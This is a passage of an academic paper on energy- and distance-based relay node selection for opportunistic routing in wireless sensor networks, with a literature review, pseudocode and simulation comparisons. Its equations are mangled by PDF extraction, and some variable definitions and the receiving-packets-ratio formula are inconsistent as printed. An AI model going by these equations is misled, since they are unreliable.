https://peerj.com http://dx.doi.org/10.7717/peerj-cs.326 Raman & Sharma (2017) proposed a forwarder method named Energy Optimization Opportunistic Routing (ENO_OR). This method uses energy level and distance to select a forwarder node. Initially, the default threshold energy level is pre-configured. Any relay node that reaches the default threshold energy level will have a chance to be selected the forwarder node. However, priority will be given to the relay node that has the highest energy level and optimal distance. The optimal distance is determined using Eq. (3). Dop= M−xh nop = { 2Ea[ (ϕ−1)Eβ ]} 1 ϕ (3) Dop is denoted as the optimal transmission distance. M is denoted as the position of the forwarder node. xh is denoted as the position of the relay node. n is the index of the relay node. Eβ is denoted as the energy required for the packet transmission. ϕ is denoted as the transmission loss due to link failure. According to the author, this method can increase the network lifetime by using the pre-configured energy threshold level and optimal distance. However, if the available relay nodes do not meet the minimum pre-configured threshold energy level, this method will use direct packets transmission to transmit packets to the destination node which might consume more energy. Hasnain, Malik & Aydin (2018) proposed a forwarder method named Adaptive Opportunistic Routing (AOR). In this method, the forwarder node is selected based on minimum energy consumption and the link quality. In order to deliver the packets from the source node to the destination node, this method uses optimal route selection. To select the optimal route, it uses minimum energy consumption and maximum link quality. Energy consumption is calculated based on the size of the packet delivered and the distance covered from the source node to the forwarder node. To determine the maximum link quality for forwarding the packets, this method uses the probability. Equation (4) shows the formula used to calculate energy consumption. Et (P,d)= { p ( Ee+γfs x d2 ) if d≤Rc p ( Ee+γmp x d4 ) if d ≥Rc (4) Et is denoted as the transmission range. P is denoted as the packet size. Ee is denoted as the overall energy consumption for the packet transmission. γfs is denoted as the forwarder node location. d2 is donated as an ideal range where packets can be successfully transmitted. γmp is denoted as the distance between the source node and the relay node. Rc is denoted as the maximum range to select the forwarder node. Equations (5) and (6) are used to calculate the link quality. These two equations are used to calculate the probability of the forwarding packets via a particular route and the progress of the forwarded packets at the route respectively. PADV (r)=ADV (r)x prob (r D S ,P) (5) ADR(r)=D(S,D)−D(S,R) (6) Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 5/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.326 PADV is donated as the probability of the packet delivery through route r, which is established based on the broadcast messages among the relay nodes. prob ( rDS ,P ) is denoted as the probability of the successful packets delivered from the source node to the destination node. ADV(r) is donated as the progress of the forwarded packets thought route r. D(S,D) is donated as the total distance from the source node to the destination node. D(S,R) is donated as the distance of the possible forwarder node from the source node. According to the authors, this method can minimize energy consumption when forwarding the packets using the optimal route selection. However, this method only uses single-path and end-to-end transmission. As a result, it might increase the latency and end-to-end delay when the relay node has insufficient energy or the link quality is poor. Khan et al. (2018) proposed a forwarder method named Cooperative Energy Efficient Optimal Relay Selection (Co-EEORS). This method produces reliable packet delivery. The forwarder node is selected based on the lowest depth and the value of the lowermost location. The value of the location interfaces and measures the distance between the source node and the destination node. Relay nodes that are located closest to the destination node will have a smaller value of the location. A relay node is selected as a forwarder node to forward the packets if it is closest to the destination node. The destination node sends an acknowledgement to the source node after receiving the packets successfully. According to the author, the proposed method achieved a higher receiving packets ratio as compared to other forwarder methods. However, there is a limitation with regards to the performance of Co-EEORS, and this seems an exceptional condition. It occurs when there is a larger distance between the relay nodes, and when the source nodes can not find the forwarder nodes, thus cooperation fails due to link failure. As a result, this method could increase overhead and latency. Li et al. (2019) proposed a forwarder method named Multi-hop Wireless Networks (MWN). In this method, the forwarder node is selected using energy-efficient metric. The energy-efficient metric is comprised of several parameters such as one-hop distance (R1,t ), transmission range (R2,t ), and the distance between the relay node and the destination node (dt ). The average forwarding distance and the total energy consumption are calculated for each hop using Eq. (7) and the energy consumption for each hop is calculated using Eq. (8). D(n)=min1≤i≤n{di} (7) di is denoted as the distance between the relay node i and the destination node. If the relay node i successfully decodes the packet, di will be given a value equals to the Euclidean distance from i to the destination node. Otherwise, di will be given a value equal to dt . Eall ( R1,t,R2,t ) = [ E1+Ect +StpEcr ] ∗L, (8) R is denoted as the radius of the relay node. E1 is denoted as the packet transmitting energy per bit. Stp is denoted as the size of the forwarding area. Ect and Ecr are denoted as the transmitter and the receiver circuit energy consumption per bit for each relay node respectively. Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 6/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.326 According to the authors, the use of the energy-efficient metrics can optimize the average forwarding distance with minimum energy consumption. However, the forwarder node in this method is selected dynamically. As a result, the selected forwarder nodes might have insufficient energy to forward the packets. When this situation happens, the packet receiving ratio will be decreased. Chithaluru, Tiwari & Kumar (2019) proposed a forwarder method named adoptive ranking based energy-efficient opportunistic routing (AREOR). This method uses single path and end to end transmission to transmit the packet from source node to destination node. It selects the best relay node to take an interest as a cluster head by utilizing versatile participatory criteria. Forwarder node is selected based on an adoptive ranking system. Relay nodes ranking is determined by computing the remaining energy and location closest to the destination node. According to the author, this method reduces energy consumption by using the adoptive ranking and optimal energy node selection. However, in this method, the forwarder node is selected based on the cluster and adoptive ranking system. Network performance will be decreased if available nodes have insufficient energy to forward the packets. Zhang et al. (2019) proposed a forwarder method named shortest-latency opportunistic routing in asynchronous WSNs. This method theoretically examines the techniques on how to select a forwarder node in Asynchronous Wireless Sensor Networks (WSNs). The proposed approach develops the probability for the relay node to be selected as a forwarder node. This method uses single-path and bop-by-hop transmission to transmit packets from source node to destination node. According to the author, end-to-end latency for opportunistic routing in asynchronous WSNs is theoretically achieved in this approach. However, this method might decrease network performance and to determine the real implication of this approach in terms of energy efficiency, there is a need to implement the proposed approach practically. Wang (2020) proposed a three-layer framework is used multiple mobile sinks with fog structure. The proposed framework aims to break the bottleneck of data collection from WSNs to the cloud. The framework was compared with various existing traditional solutions. The experimental result reveals that the framework can help in the improvement of throughput and the reduction of transmission delay. Liang (2020) proposed a reliable trust computing mechanism (RTCM). The framework helps in enhancing the reliability and efficiency of data transfer to the cloud. The result shows some promise. Thakkar and Kotecha proposed a routing algorithm that utilizes the energy-delay index for a trade-off to optimize both objectives-energy and delay (Thakkar, 2014a; Thakkar, 2014b). The result shows that the proposed algorithm performs well. Thakkar and Kotecha further proposed a cluster formation technique with a decentralized cluster head election method (Thakkar, 2015). The authors used Bollinger Bands to elect a cluster head. The result shows significant improvement. In another study by Thakkar, the author proposed an advanced LEACH protocol named DEAL (Thakkar, 2017). The protocol takes energy and distance of a node into consideration during cluster head election process. The result shows that the proposed protocol enhances the stability period in comparison to the Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 7/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.326 existing state-of-the-art. Furthermore, Thakkar also published two more studies in the research theme (Thakkar, 2014a; Thakkar, 2014b; Thakkar, 2016). Table 1 shows the synthesis of the selected related work. From the review, we noticed that most of the existing forwarder methods produce high first dead node, high latency, high energy consumption, and less network lifetime. several reasons cause these weaknesses to happen. For example, some of the forwarder methods do not consider energy level, and they always need to broadcast messages to all the relay nodes when determining the forwarder node. As a result, these types of forwarder methods might cause the relay node to die quickly or drop the received packet due to insufficient energy. Moreover, some of the forwarder methods use unicast, single-path, and end-to-end transmission to transmit packets. These types of transmissions might increase the latency and end-to-end delay when the relay node has insufficient energy, or the link quality is poor, or the path is congested. From this review results, it is shown that there is still room for improvement in this domain, especially in the aspects of latency, first dead node, network lifetime, and receiving packets ratio. Thus, this research was carried out to propose a relay node selection method to improve the drawbacks above. MATERIALS & METHODS In this section, the simulation settings used by Luo et al. (2015) to evaluate the proposed method are presented. The simulation is conducted in OMNET++ simulator and MiXiM framework. The proposed method and the related works are simulated using the simulation settings in Table 2. OMNET++ and MiXiM are chosen because they have the required libraries such as stdio.h, string.h, omnetpp.h, ‘‘bs.h’’, ‘‘node.h’’, ‘‘cl_msg_m.h’’, ‘‘gesteb.h’’, and c0utVector class which are required when implementing the proposed method and the related works (Bouachir et al., 2016; Zhao, Mosler & Braun, 2012). The simulation is carried out in an area of 500 m2 network size with 100 nodes that are uniformly deployed. The network consists of one source node, one destination node, and 98 relay nodes. The maximum range between relays nodes is 30 m, while the minimum range is 15 m. The packet size 1,024 bit is used for transmission. The initial threshold energy level is set as 50%. The sending rate is one packet per second. The simulation time is set 900 s and adopted from Luo et al. (2015). The simulation is executed 100 times for each result, as suggested by Ritter et al. (2011). The simulation results are collected individual and manually, and ‘‘R’’ program is used to compare the results Proposed methods To provide a clear overview, a high-level description of the proposed method is described in this section. To ease the explanation, we pre-configured the threshold energy and the energy level for each relay node before demonstrating how a given packet is sent from the source node to the destination node. Initially, the source node will select a relay node to forward a packet based on the distance and the energy level. In the previous studies, some methods used either distance or energy level to perform routing. Moreover, several researchers (Hawbani et al., 2019; Kannan & Raja, 2015; Nadar et al., 2017) reported that Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 8/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.326 Table 1 Comparison of selected related works. Forwarder method Year Routing mechanism Forwarding list selection Advantages Disadvantages GeRaF (Zorzi & Rao, 2003) 2003 Multi-path Hop-by-Hop � Reduce latency. � Decrease network lifetime. ExOR (Biswas & Morris, 2005) 2005 Single-path End-to-End � Increase throughput. � Increase overhead. EEOR (Mao et al., 2011) 2011 Single-path End-to-End � Minimize energy consumption. � Increase network lifetime. � Produce high first dead node. Short-Haul (Lee & Haas, 2011) 2011 Multi-Path Hop-by-Hop � Increase throughput � Reduce the ratio of the duplication packets. � Produce high energy consumption. � Decrease network lifetime. ENS_OR (Luo et al., 2015) 2015 Single-path End-to-End � Minimize energy consumption. � Increase network lifetime. � Decrease network performance. ENO_OR (Raman & Sharma, 2017) 2017 Single-path Hop-by-Hop � Increase network lifetime. � Consume more energy. AOR (Hasnain, Malik & Aydin, 2018) 2018 Single-path End-to-End � Minimize energy consumption. � Increase latency. � End-to-end delay. Co-EEORS (Khan et al., 2018) 2018 Single-path End-to-End � Increase receiving packets ratio. � Increase overhead. � Increase latency. MWN (Li et al., 2019) 2019 Single-path Hop-by-Hop � Minimize energy consumption. � Decrease receiving packets ratio. AREOR (Chithaluru, Tiwari & Kumar, 2019) 2019 Single-path End-to-End � Reduce energy consumption. � Decrease network performance. Shortest-Latency (Zhang et al., 2019) 2019 Single-path Hop-by-Hop � Reduce latency. � Decrease network performance. Wang et al. (Wang, 2020) 2020 Single-path Hop-by-Hop � Minimize energy consumption. � Increase latency. Liang et al. (Liang, 2020) 2020 Multi-Path Hop-by-Hop � Increase throughput. � Decrease network lifetime. Thakkar and Kotecha (Thakkar, 2014a; Thakkar, 2014b) 2014 Multi-Path Hop-by-Hop � Increase network lifetime. � Reduce the ratio of the duplication packets. � Decrease network lifetime. Thakkar and Kotecha (Thakkar, 2015) 2015 Multi-Path Hop-by-Hop � Minimize energy consumption. � Reduce latency. � Decrease network performance. Thakkar (Thakkar, 2017) 2017 Single-path End-to-End � Minimize energy consumption. � Increase latency. Thakkar and Kotecha (Thakkar, 2014a; Thakkar, 2014b) 2014 Multi-Path Hop-by-Hop � Minimize energy consumption. � Reduce latency. � Decrease network performance. Thakkar (Thakkar, 2016) 2016 Multi-Path Hop-by-Hop � Minimize energy consumption. � Reduce latency. � Decrease network performance. Yee etal. (2020),P eerJ C om put. S ci.,D O I10.7717/peerj-cs.326 9/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.326 Table 2 Simulation settings. Parameter Values Network size 500 m×500 m Node deployment Uniform Number of nodes 100 Source node 1 Destination node 1 Relay nodes 98 Maximum range 30 m Minimum range 15 m Packet size 1,024 bit Threshold energy level 50% Sending rate 1 packet/s Simulation time 900 s distance and energy levels are the most commonly used metrics to select the best relay node. Therefore, we used and improvised these two metrics in our proposed method to select a relay node. In our proposed method, the selected relay node is called the forwarder node. The source node will forward the packet to the forwarder node. After transmitting the packet, the energy level of the source node will be reduced based on the distance covered and the size of the packet delivered during the transmission. The current forwarder node will use the same mechanism to select another relay node to become the next forwarder node. Similarly, the energy level of the current forwarder node will be reduced after the packet is transmitted to the next forwarder node. This process will be repeated until the packet reaches the destination node. Hence, the proposed method has a distributed architecture. Proposed method illustration Assuming that a source node (S) is going to transmit a packet to a destination node (D), and the pre-configured threshold energy level is set as 50%. In our proposed method, S will first use the minimum range to search for an available relay node to become the forwarder node (see Fig. 1). Equation (9) is adopted from Alia & Al-Ajouri (2016) to calculate the minimum range. DminR min(i,l)d(si,sl)√ W 2m+H 2 m (9) min(i,l)d(si,sl) is the minimum distance between relay nodes. √ W 2m+H 2 m is the maximum length between any two relay nodes which can be represented by the diagonal length of the monitored field. Since there is more than one relay node with a threshold energy level more than or equal to 50%, therefore, the proposed method will give higher priority to the relay node that has the highest energy level. If there is a tie, the nearest distance will become the second priority for the selection process. If there is no relay node fulfils the minimum threshold energy level (50%), the proposed method will use the maximum range to search for any Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 10/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.326 Figure 1 Determine a forwarder node using the minimum range. Full-size DOI: 10.7717/peerjcs.326/fig-1 suitable relay nodes to become the forwarder node. In this example, the relay node that has a 90% energy level is selected as the forwarder node. To find the next forwarder node, the proposed method will use the minimum range to search for an available relay node that fulfils the minimum energy level threshold (50%). Since there is no relay node fulfils the minimum energy level threshold, the proposed method then uses the maximum range to search for any suitable relay nodes to become the next forwarder node (see Fig. 2). Equation (10) is adopted from Luo et al. (2015) to calculate the maximum range. dop=M−xh= { (2Eelec)/ [ (τ−1)εamp ]}1/τ (10) dop is the optimal transmission distance. M is the index of a relay node. xh is the position of the relay nodes. Eelec is the energy consumption of the relay node during transmission. εamp is the energy dissipated in the transmit amplifier. τis the channel route-loss exponent of the antenna. d is the distance between the current forwarder node and the next forwarder node. In this example, the relay node that has 78% energy level is selected as the next forwarder node. The energy level of the previous forwarder node will be reduced after the packet is transmitted to the next forwarder node. To find the next forwarder node, the same mechanism is used. The proposed method will first use the minimum range to search for an available relay node that fulfils the minimum threshold energy level. Since there are two relay nodes with the same energy level (87%), the nearest distance will become the second priority for the selection process (see Fig. 3). In this example, the relay node that is closest to the current forwarder node is selected as the next forwarder node. The energy level of the previous forwarder node will be reduced after the packet is transmitted to the next forwarder node. The find next forwarder node, the proposed method will use the minimum range to search for an available relay node that fulfils the minimum threshold energy level (see Fig. 4). Since there is no relay node fulfils the minimum threshold energy level, the proposed Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 11/25 https://peerj.com https://doi.org/10.7717/peerjcs.326/fig-1 http://dx.doi.org/10.7717/peerj-cs.326 Figure 2 Determine a forwarder node using the maximum range. Full-size DOI: 10.7717/peerjcs.326/fig-2 Figure 3 Determine a forwarder node using the nearest distance. Full-size DOI: 10.7717/peerjcs.326/fig-3 method then uses the maximum range to search for any suitable relay nodes to become the next forwarder node. Since there is no relay node fulfils the maximum threshold energy level; also, the proposed method will reduce the threshold energy level using Eq. (11). Thenergy = { Thenergyx Ere Ein if n∈Gelsewire (11) Thenergy is the threshold for the energy level, Ere is the residual energy of the relay node. Ein is the initial energy of the relay node. G is the set of all the relay node. Assuming that the new threshold energy level after the calculation is 40%. A broadcast message will be sent to notify each of the relay nodes about the new threshold level. The proposed method then continue using the minimum range to search for an available relay node that fulfils the new threshold energy level. In this example, the relay node that has the highest energy level is selected as the next forwarder node. The energy level of the previous forwarder node will be reduced after the packet is transmitted to the next forwarder node. Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 12/25 https://peerj.com https://doi.org/10.7717/peerjcs.326/fig-2 https://doi.org/10.7717/peerjcs.326/fig-3 http://dx.doi.org/10.7717/peerj-cs.326 Figure 4 Determine a forwarder node by decreasing the threshold energy level. Full-size DOI: 10.7717/peerjcs.326/fig-4 Figure 5 Transmit a packet to the destination node. Full-size DOI: 10.7717/peerjcs.326/fig-5 The current forwarder node continues to search for the next available relay node within the minimum range to forward the packet. Since the destination node is within the minimum range, the packet will deliver to the destination node (see Fig. 5). In this example, a packet only required six hops to transmit from a source node to a destination node using the proposed method (see Fig. 6). The pseudo-code and the flowchart of the proposed method are shown in Figs. 7 and 8, respectively. RESULTS The proposed method and other related works are evaluated based on the following routing metrics: Latency (L): L is used to determine the average time of the packets that are successfully delivered to the destination node. Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 13/25 https://peerj.com https://doi.org/10.7717/peerjcs.326/fig-4 https://doi.org/10.7717/peerjcs.326/fig-5 http://dx.doi.org/10.7717/peerj-cs.326 Figure 6 Paths of the packet transmitted using the proposed method. Full-size DOI: 10.7717/peerjcs.326/fig-6 First dead node (FDN): FDN is defined to measure the network connectivity and to check the appearance of the first dead node in the network. Network lifetime (NL): NL is used to determine the energy consumption and network partition. FDN and NL are essential metrics to increase the network lifetime. Receiving packets ratio (RPR): RPR is used to determine the total number of packets that are successfully received by the destination node. These aspects are used because this is the main focus of our research work. Moreover, the other related works also used the same metrics for evaluation (Hasnain, Malik & Aydin, 2018; Luo et al., 2015; Raman & Sharma, 2017). Therefore, we believe the evaluation and comparison can be carried out fairly. The details of each result analysis are discussed in the following subsections. Result analysis for latency (L) Figure 9 illustrates the packet delivery latency comparison among the proposed method and the other related works. Packet delivery latency is calculated based on the formula used by Liang, Luo & Xu (2013) (see Eq. (12)). This equation is used because it is the standard formula used to calculate the latency (L) in the opportunistic network (Liang, Luo & Xu, 2013). L= n∑ i=0 (Tcontention(k)+Tdata)+(N −1) (12) ∑n i=0(x) is the summation for all relay nodes, x is the parameters, T contention(k) is the contention time, Tdata is the packet transmission time, N is the number nodes. The simulation results shown that our proposed method has the lowest packet delivery latency followed by Adaptive Opportunistic Routing (AOR), ENergy Optimization Opportunistic Routing (ENO_OR), ENergy Savings via Opportunistic Routing (ENS_OR), Opportunistic multi-hop routing (ExOR), Geographic Random Forwarding (GeRaF) and Energy-Efficient Opportunistic Routing (EEOR). On average, our proposed method Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 14/25 https://peerj.com https://doi.org/10.7717/peerjcs.326/fig-6 http://dx.doi.org/10.7717/peerj-cs.326 Algorithm: Relay node selection and packet forwarding S = Source Node F = Forwarder node N = Node E = Energy D = Destination Event: S has a packet to send to the D. /*steps*/ 1. set threshold energy level 2. S select minimum range 3. check E for Ns 4. if (threshold energy level ≥ the energy level of the nodes) then 5. do 6. check N with highest E 7. select N with highest E 8. goto 13; 9. else 10. if (more than one N with equal E) then 11. do 12. select the nearest N 13. set as F 14. S forward the packet to F 15. S E will be reduced 16. if (packet reaches to D) 17. end 18. else 19. goto 2; 20. endif 21. else 22. S select maximum range 23. check E for Ns 24. if (threshold energy level ≥ the energy level of the nodes) then 25. do 26. goto 6; 27. else 28. reduce threshold energy level 29. goto 1; 30. endif 31. endif 32. return Figure 7 The pseudo code of the proposed method. Full-size DOI: 10.7717/peerjcs.326/fig-7 Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 15/25 https://peerj.com https://doi.org/10.7717/peerjcs.326/fig-7 http://dx.doi.org/10.7717/peerj-cs.326 Figure 8 Flowchart of the proposed method. Full-size DOI: 10.7717/peerjcs.326/fig-8 Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 16/25 https://peerj.com https://doi.org/10.7717/peerjcs.326/fig-8 http://dx.doi.org/10.7717/peerj-cs.326 Figure 9 Latency comparison. Full-size DOI: 10.7717/peerjcs.326/fig-9 produces approximately 23.38%, 27.57%, 32.56%, 43.48%, 64.15%, and 75.86% lesser packet delivery latency compared to AOR, ENO_OR, ENS_OR, ExOR, GeRaF and EEOR respectively. The reason that our proposed method could perform better compared to other methods might due to the minimum or maximum range selection mechanism used. In the best case scenario, if all the forwarder nodes fulfilled the required threshold energy and used the minimum range to forward the packets, the packets could be delivered without further delay. Result analysis for first dead node (FDN) Figure 10 illustrates the first dead node comparison among our proposed method and the other related works. First dead node is calculated based on the formula used by Ren et al. (2016) (see Eq. (13)). This equation is used because it is the standard formula used to calculate the first dead node (FDN) in the opportunistic network (Ren et al., 2016). FDN = [ E0 max(0)Ex ] (13) E0 is the initial energy of the relay node. max (0) Ex is the maximum energy consumption of the relay node. The simulation results shown that our proposed method has the highest simulation time for the first dead node followed by AOR, ENO_OR, ENS_OR, ExOR, GeRaF and EEOR. On average, our proposed method produces approximately 10.68%, 15.54%, 17.14%, 42.11%, 50.30%, and 68.61% longer simulation time for the first dead node compared to AOR, ENO_OR, ENS_OR, EXOR, GeRaF and EEOR respectively. The reason that our proposed method could perform better compared to other methods might due to the optimum energy level selection mechanism used. Averagely, in our proposed method, if a relay node was selected to forward a packet, it normally would not be selected again in Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 17/25 https://peerj.com https://doi.org/10.7717/peerjcs.326/fig-9 http://dx.doi.org/10.7717/peerj-cs.326 Figure 10 First dead node comparison. Full-size DOI: 10.7717/peerjcs.326/fig-10 the subsequence round to forward a packet unless it has the highest energy level among the other relay nodes and still fulfill the required threshold energy level. Therefore, our proposed method could prolong the time of the first dead node at the same time we could still select the best relay node to forward the packet. Result analysis for network lifetime (NL) Figure 11 illustrates the network lifetime comparison among our proposed method and the other related works. Network lifetime is calculated based on the formula used by Ren et al. (2016) (see Eq. (14)). This equation is used because it is the standard formula used to calculate the network lifetime (NL) in the opportunistic network (Ren et al., 2016). NL=nE0− i∑ c=0 n∑ j=0 ( E(i)j ∗l (i) ) (14) nE0 is the initial energy of the network, ∑i c=0 ∑n j=0 ( E(i)j ∗l (i) ) is the remaining energy of the network. E(i)j is the average energy consumption of the relay node. l (i) is the duration of the relay node. The simulation results shown that our proposed method has the highest network lifetime followed by AOR, ENO_OR, ENS_OR, ExOR, GeRaF and EEOR. On average, our proposed method produces approximately 7.10%, 8.35%, 10.58%, 28.57%, 50%, and 66.67% higher network lifetime compared to AOR, ENO_OR, ENS_OR, EXOR, GeRaF and EEOR respectively. The reason that our proposed method could perform better compared to other methods might due to the selection mechanism used in our proposed method that based on nearest distance followed by the highest energy level. Moreover, our proposed method could reduce the threshold energy level if a suitable relay node could not be found after using the minimum/maximum range as well as the existing threshold energy level. Therefore, our proposed method could prolong the network lifetime. Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 18/25 https://peerj.com https://doi.org/10.7717/peerjcs.326/fig-10 http://dx.doi.org/10.7717/peerj-cs.326 Figure 11 Network lifetime comparison. Full-size DOI: 10.7717/peerjcs.326/fig-11 Result analysis for receiving packets ratio (RPR) Figure 12 illustrates the receiving packets ratio comparison among the proposed method and the other related works. Receiving packets ratio is calculated based on the formula used by Ren et al. (2016) (see Eq. (15)). This equation is used because it is the standard formula used to calculate the receiving packets ratio (RPR) in the opportunistic network (Ren et al., 2016). RPR=1− ∑ RDP∑ SDP (15) ∑ RDP is the total number of packet received by the destiation node. ∑ SDPis the total number of packet sent to the destinaton node. The simulation results shown that our proposed method has the highest receiving packet ratio followed by AOR, ENO_OR, ENS_OR, ExOR, GeRaF and EEOR. On average, our proposed method produces 21.55%, 27.77%, 30.67%, 40%, 68.66%, and 85.71% higher receiving packets ratio compared to AOR, ENO_OR, ENS_OR, EXOR, GeRaF and EEOR respectively. The reason that our proposed method could produce higher receiving packets ratio compared to other methods might due to the selection mechanism used in our proposed method that based on nearest distance followed by the highest energy level. Additionally, our proposed method could reduce the threshold energy level if no suitable relay node could be found after using the minimum/maximum range as well as the existing threshold energy level. As a whole, the simulation results shown that our proposed method was able to perform better than the related works because of the following reasons: (i) Our proposed method could use a relay node that falled within the minimum range to forward the packet if the relay node has the highest energy level. Therefore, it would reduce the latency when delivering the packet to the destination node. (ii) The optimum energy level selection Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 19/25 https://peerj.com https://doi.org/10.7717/peerjcs.326/fig-11 http://dx.doi.org/10.7717/peerj-cs.326 Figure 12 Receiving packets ratio comparison. Full-size DOI: 10.7717/peerjcs.326/fig-12 mechanism used in our proposed method could reduce the chances of a forwarder node from taking part to forward a packet again unless it still has the maximum energy level compared to other relay nodes. Therefore, it will prolong the time of the first dead node. (iii) Our proposed method could reduce the threshold energy level from time to time if no suitable relay node is found. Our selection mechanism could use the new threshold energy level together with the minimum/maximum range searching mechanism to determine a suitable relay node. As a result, our proposed method could prolong the network lifetime and produce a higher receiving packet ratio. CONCLUSIONS AND FUTURE WORK In this paper, an improved relay node selection method was proposed. The proposed method that uses the minimum or maximum range and optimum energy level to select the best relay node to forward the packet was proposed to improve the performance of routing in the opportunistic network. In our proposed method, the threshold energy level needs to be pre-configured. After that, our proposed method will use the minimum range to determine a forwarder node. The maximum range will only be used if no relay node fulfills the minimum threshold energy level within the minimum range. To select the forwarder node, priority is given to the node that has the highest energy level. If there is a tie, the nearest distance will become the second priority for the selection process. If no relay nodes meet the minimum threshold energy level, the proposed method reduces the threshold energy level and uses the same mechanism to determine a forwarder node. A broadcast message is sent to notify all the relay nodes about the new threshold level. This process is repeated until a packet is forwarded to the destination node. Several simulations were conducted to evaluate the proposed method based on L, FDN, NL, and RPR. The results showed that our proposed method could (i) produce lower latency, (ii) prolong the Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 20/25 https://peerj.com https://doi.org/10.7717/peerjcs.326/fig-12 http://dx.doi.org/10.7717/peerj-cs.326 time for the first dead node, (iii) improve the network lifetime, and (iv) produce a higher receiving packet ratio compared to other methods. For future work, we intend to investigate whether it is practical to integrate our proposed method with ‘‘network coding’’. Zhai et al. (2018) proposed ‘‘network coding’’ technique in 2018. According to the authors, ‘‘network coding’’ is a technique that can be used to forward more than one packet/message in each transmission. As a result, an assumption was made that by integrating the proposed method with ‘‘network coding’’, the performance of routing in the opportunistic network could be improved. Therefore, in the future, more researches would be carried out in this area. Besides, we intend to investigate whether it is practical to integrate our proposed method with Cognitive Radio Networks (CRNs). Kafaie et al. (2018) proposed the CRNs technique in 2018. CRNs is a paradigm of wireless communication that allows unlicensed secondary users to adjust their transmission parameters in order to achieve efficient usage of radio spectrum resources without any harmful interference to the licensed primary user. CRNs are getting more and more popular in the opportunistic network because it provides dynamic spectrum access, and more efficient and secure data transmission (Kafaie et al., 2018). An assumption was made that by integrating our proposed method as one of the features or libraries in CRNs, it might create more revenue for researchers in this domain. However, the proposed method might not fit well in the current routing metrics in CRNs. Therefore, in the future, more researches would be carried out to enable our proposed method to be embedded as one of the feature or library in CRNs. Abbreviations The following abbreviations are used in this manuscript: AOR Adaptive Opportunistic Routing AREOR Adaptive Ranking based Energy-efficient Opportunistic Routing Co-EEORS Cooperative Energy Efficient Optimal Relay Selection CRNs Cognitive Radio Networks D Destination node E Energy EEOR Energy Efficient Opportunistic Routing ENO_OR Energy Optimization Opportunistic Routing ENS_OR Energy Savings via Opportunistic Routing ETT Expected Transmission Time ETX Expected Transmission Count ExOR Opportunistic Multi-hop Routing F Forwarder node FDN First dead node GeRaF Geographic Random Forwarding L Latency MiXiM Mixed simulator Min-Max Range Minimum and Maximum range MWN Multi-hop Wireless Networks N Node Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 21/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.326 NL Network Lifetime OMNeT++ Objective Modular Network Testbed in C++ OR Opportunistic Routing RPR Receiving Packets Ratio S Source node Shortest-latency Shortest-latency opportunistic routing in asynchronous WSNs Short-Haul Short-haul Multi-hop WSNs Wireless Sensor Networks ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Bantuan Khas Penyelidikan (BKS022-2018) from the University of Malaya, Malaysia, Postgraduate Research Grant under Grant PG035-2016A and also the Fundamental Research Grant Scheme (FP114-2018A) from the Ministry of Higher Education, Malaysia. This work was also supported by King Saud University, Riyadh, Saudi Arabia, through Researchers Supporting Project number RSP-2020/184. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: University of Malaya, Malaysia: BKS022-2018. Postgraduate Research Grant: PG035-2016A. Fundamental Research Grant Scheme from the Ministry of Higher Education, Malaysia: FP114-2018A. King Saud University, Riyadh, Saudi Arabia: RSP-2020/184. Competing Interests The authors declare there are no competing interests. Author Contributions • Por Lip Yee conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • Shahid Mehmood performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • Ahmad Almogren analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Ihsan Ali performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. • Mohammad Hossein Anisi analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The code is available in the Supplemental Files. Yee et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.326 22/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.326#supplemental-information http://dx.doi.org/10.7717/peerj-cs.326 Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.326#supplemental-information. REFERENCES Alia O, Al-Ajouri A. 2016. Maximizing wireless sensor network coverage with minimum cost using harmony search algorithm. IEEE Sensors Journal 17(3):882–896. Biswas S, Morris R. 2005. ExOR: opportunistic multi-hop routing for wireless net- works. ACM SIGCOMM Computer Communication Review 35(4):133–144 DOI 10.1145/1090191.1080108. Boukerche A, Darehshoorzadeh A. 2014. Opportunistic routing in wireless networks: models, algorithms, and classifications. ACM Computing Surveys (CSUR) 47(2):1–36. Bouachir O, Mnaouer AB, Touati F, Crescini D. 2016. Opportunistic routing and data dissemination protocol for energy harvesting wireless sensor networks. In: 2016 8th IFIP International Conference on New Technologies, Mobility and Security (NTMS). Piscataway: IEEE, 1–5. Chachulski S, Jennings M, Katti S, Katabi D. 2007. Trading structure for randomness in wireless opportunistic routing. Vol. 37. New York: 